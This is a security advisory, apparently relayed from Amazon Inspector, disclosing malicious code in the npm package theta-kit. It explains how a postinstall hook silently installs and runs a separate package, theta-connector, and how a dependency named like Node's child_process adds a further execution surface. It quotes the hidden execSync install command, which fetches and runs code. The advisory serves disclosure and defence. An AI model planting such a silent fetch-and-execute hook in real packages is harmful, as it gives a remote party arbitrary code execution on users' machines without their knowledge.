Vulnerability
Malicious code in theta-kit (npm)
---

## Source: amazon-inspector (09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039)

package.json declares `postinstall: node dist/index.js`, and dist/index.js executes `Model.resetor()` at module top level, meaning both `npm install theta-kit` and `require('theta-kit')` hand control to a separate package, `theta-connector`. `resetor()` instantiates `new ThetaConnector({})` and calls `db.queryDBConnect()`.

If `theta-connector` is not present, the catch branch silently runs `execSync('npm install theta-connector --no-warnings --no-save --no-progress --loglevel silent')` and then `require`s and executes it. The package that ultimately runs is not shipped in this tarball, so its bytes can change at any time without any update to theta-kit. Output is suppressed and errors are swallowed, hiding the fetch-and-execute from the installer.

The package also declares a runtime dependency on `child_process@^1.0.2`, an unrelated registry placeholder sharing a name with Node's built-in module. This confusion pattern adds a second installer-controlled execution surface.

The install-time fetch-and-execute pattern, combined with the silent self-install fallback and the unrelated `child_process` registry dependency, is unrelated to the package's advertised mobx in-memory DB purpose and gives the maintainer of `theta-connector` arbitrary code execution on every install or require of theta-kit.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
FIRST.org publishes EPSS daily. Coverage isn't universal: pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands.
No exploitation, limited impact or prevalence